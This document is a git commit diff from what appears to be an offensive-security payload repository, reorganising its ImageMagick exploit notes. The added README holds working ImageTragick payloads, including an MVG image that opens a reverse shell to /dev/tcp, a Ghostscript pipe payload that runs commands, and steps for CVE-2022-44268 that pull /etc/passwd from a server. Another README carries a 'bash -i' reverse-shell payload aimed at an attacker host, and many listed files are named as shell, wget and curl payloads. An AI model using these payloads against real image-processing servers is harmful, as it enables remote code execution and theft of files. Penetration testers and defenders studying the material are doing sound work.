ImageMagick Typo

2024-05-08 10:46:20 +02:00 · 2023-03-19 22:46:56 +01:00 · 2023-03-19 22:46:56 +01:00 · dd0c23f9a2
parent 723b3213b2
commit dd0c23f9a2
28 changed files with 65 additions and 49 deletions
--- a/Resources/Active
+++ b/Resources/Active
@ -4430,4 +4430,5 @@ CME          10.XXX.XXX.XXX:445 HOSTNAME-01   [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
 * [ADIDNS Revisited – WPAD, GQBL, and More - December 5, 2018 | Kevin Robertson](https://www.netspi.com/blog/technical/network-penetration-testing/adidns-revisited/)
 * [Getting in the Zone: dumping Active Directory DNS using adidnsdump - Dirk-jan Mollema](https://blog.fox-it.com/2019/04/25/getting-in-the-zone-dumping-active-directory-dns-using-adidnsdump/)
 * [S4U2self abuse - TheHackerRecipes](https://www.thehacker.recipes/ad/movement/kerberos/delegations/s4u2self-abuse)
-* [Abusing Kerberos S4U2self for local privilege escalation - cfalta](https://cyberstoph.org/posts/2021/06/abusing-kerberos-s4u2self-for-local-privilege-escalation/)
+* [Abusing Kerberos S4U2self for local privilege escalation - cfalta](https://cyberstoph.org/posts/2021/06/abusing-kerberos-s4u2self-for-local-privilege-escalation/)
+* [External Trusts Are Evil - 14 March 2023 - Charlie Clark (@exploitph)](https://exploit.ph/external-trusts-are-evil.html)
--- a/Magik/README.md
+++ b/Magik/README.md
@ -1,38 +0,0 @@
-# Image Tragik 1 & 2
-
-
-## Exploit v1
-
-Simple reverse shell
-
-```powershell
-push graphic-context
-encoding "UTF-8"
-viewbox 0 0 1 1
-affine 1 0 0 1 0 0
-push graphic-context
-image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1'
-pop graphic-context
-pop graphic-context
-```
-
-## Exploit v2
-
-Simple `id` payload
-
-```powershell
-%!PS
-userdict /setpagedevice undef
-save
-legal
-{ null restore } stopped { pop } if
-{ legal } stopped { pop } if
-restore
-mark /OutputFile (%pipe%id) currentdevice putdeviceprops
-```
-
-then use `convert shellexec.jpeg whatever.gif`
-
-## Thanks to
-
-* [openwall.com/lists/oss-security/2018/08/21/2 by Tavis Ormandy](http://openwall.com/lists/oss-security/2018/08/21/2)
--- a/ImageMagick/README.md
+++ b/ImageMagick/README.md
@ -0,0 +1,52 @@
+# ImageMagick Exploits
+
+## ImageTragik Exploit v1
+
+Simple reverse shell
+
+```powershell
+push graphic-context
+encoding "UTF-8"
+viewbox 0 0 1 1
+affine 1 0 0 1 0 0
+push graphic-context
+image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1'
+pop graphic-context
+pop graphic-context
+```
+
+## ImageTragik Exploit v2
+
+Simple `id` payload
+
+```powershell
+%!PS
+userdict /setpagedevice undef
+save
+legal
+{ null restore } stopped { pop } if
+{ legal } stopped { pop } if
+restore
+mark /OutputFile (%pipe%id) currentdevice putdeviceprops
+```
+
+then use `convert shellexec.jpeg whatever.gif`
+
+
+## CVE-2022-44268
+
+Information Disclosure: embedded the content of an arbitrary remote file
+
+* Generate the payload
+    ```ps1
+    apt-get install pngcrush imagemagick exiftool exiv2 -y
+    pngcrush -text a "profile" "/etc/passwd" exploit.png
+    ```
+* Trigger the exploit by uploading the file. The backend might use something like `convert pngout.png pngconverted.png`
+* Download the converted picture and inspect its content with: `identify -verbose pngconverted.png`
+* Convert the exfiltrated data: `python3 -c 'print(bytes.fromhex("HEX_FROM_FILE").decode("utf-8"))'` 
+
+
+## Thanks to
+
+* [openwall.com/lists/oss-security/2018/08/21/2 by Tavis Ormandy](http://openwall.com/lists/oss-security/2018/08/21/2)
--- a/ImageMagick/convert_local_etc_passwd.svg
+++ b/ImageMagick/convert_local_etc_passwd.svg
--- a/ImageMagick/convert_local_etc_passwd_html.svg
+++ b/ImageMagick/convert_local_etc_passwd_html.svg
--- a/ImageMagick/ghostscript_rce_curl.jpg
+++ b/ImageMagick/ghostscript_rce_curl.jpg
--- a/ImageMagick/imagemagick_CVE-2022-44268_convert_etc_passwd.png
+++ b/ImageMagick/imagemagick_CVE-2022-44268_convert_etc_passwd.png
--- a/ImageMagick/imagemagick_ghostscript_cmd_exec.pdf
+++ b/ImageMagick/imagemagick_ghostscript_cmd_exec.pdf
--- a/ImageMagick/imagemagik_ghostscript_reverse_shell.jpg
+++ b/ImageMagick/imagemagik_ghostscript_reverse_shell.jpg
--- a/ImageMagick/imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg
+++ b/ImageMagick/imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg
--- a/ImageMagick/imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg
+++ b/ImageMagick/imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg
--- a/ImageMagick/imagetragik1_payload_imageover_reverse_shell_devtcp.jpg
+++ b/ImageMagick/imagetragik1_payload_imageover_reverse_shell_devtcp.jpg
--- a/ImageMagick/imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png
+++ b/ImageMagick/imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png
--- a/ImageMagick/imagetragik1_payload_imageover_wget.gif
+++ b/ImageMagick/imagetragik1_payload_imageover_wget.gif
--- a/ImageMagick/imagetragik1_payload_url_bind_shell_nc.mvg
+++ b/ImageMagick/imagetragik1_payload_url_bind_shell_nc.mvg
--- a/ImageMagick/imagetragik1_payload_url_curl.png
+++ b/ImageMagick/imagetragik1_payload_url_curl.png
--- a/ImageMagick/imagetragik1_payload_url_portscan.jpg
+++ b/ImageMagick/imagetragik1_payload_url_portscan.jpg
--- a/ImageMagick/imagetragik1_payload_url_remote_connection.mvg
+++ b/ImageMagick/imagetragik1_payload_url_remote_connection.mvg
--- a/ImageMagick/imagetragik1_payload_url_reverse_shell_bash.mvg
+++ b/ImageMagick/imagetragik1_payload_url_reverse_shell_bash.mvg
--- a/ImageMagick/imagetragik1_payload_url_touch.jpg
+++ b/ImageMagick/imagetragik1_payload_url_touch.jpg
--- a/ImageMagick/imagetragik1_payload_xml_reverse_shell_nctraditional.xml
+++ b/ImageMagick/imagetragik1_payload_xml_reverse_shell_nctraditional.xml
--- a/ImageMagick/imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml
+++ b/ImageMagick/imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml
--- a/ImageMagick/imagetragik2_burpcollaborator_passwd.jpg
+++ b/ImageMagick/imagetragik2_burpcollaborator_passwd.jpg
--- a/ImageMagick/imagetragik2_centos_id.jpg
+++ b/ImageMagick/imagetragik2_centos_id.jpg
--- a/ImageMagick/imagetragik2_ubuntu_id.jpg
+++ b/ImageMagick/imagetragik2_ubuntu_id.jpg
--- a/ImageMagick/imagetragik2_ubuntu_shell.jpg
+++ b/ImageMagick/imagetragik2_ubuntu_shell.jpg
--- a/ImageMagick/imagetragik2_ubuntu_shell2.jpg
+++ b/ImageMagick/imagetragik2_ubuntu_shell2.jpg
--- a/Files/README.md
+++ b/Files/README.md
@ -11,7 +11,7 @@
    * [Filename vulnerabilities](#filename-vulnerabilities)
    * [Picture compression](#picture-compression-)
    * [Configuration Files](#configuration-files)
-    * [CVE - Image Tragik](#cve---image-tragik)
+    * [CVE - ImageMagick](#cve---imagemagick)
    * [CVE - FFMpeg](#cve---ffmpeg)
    * [ZIP Archive](#zip-archive)
    * [Jetty RCE](#jetty-rce)
@ -161,18 +161,19 @@ Alternatively you may be able to upload a JSON file with a custom scripts, try t
    }
    ```

-### CVE - Image Tragik
+### CVE - ImageMagick

-Upload this content with an image extension to exploit the vulnerability (ImageMagick , 7.0.1-1)
+If the backend is using ImageMagick to resize/convert user images, you can try to exploit well-known vulnerabilities such as ImageTragik.

-```powershell
-push graphic-context
-viewbox 0 0 640 480
-fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
-pop graphic-context
-```
+* ImageTragik example: Upload this content with an image extension to exploit the vulnerability (ImageMagick , 7.0.1-1)
+    ```powershell
+    push graphic-context
+    viewbox 0 0 640 480
+    fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
+    pop graphic-context
+    ```

-More payload in the folder `Picture Image Magik`
+More payloads in the folder `Picture ImageMagick`

 ### CVE - FFMpeg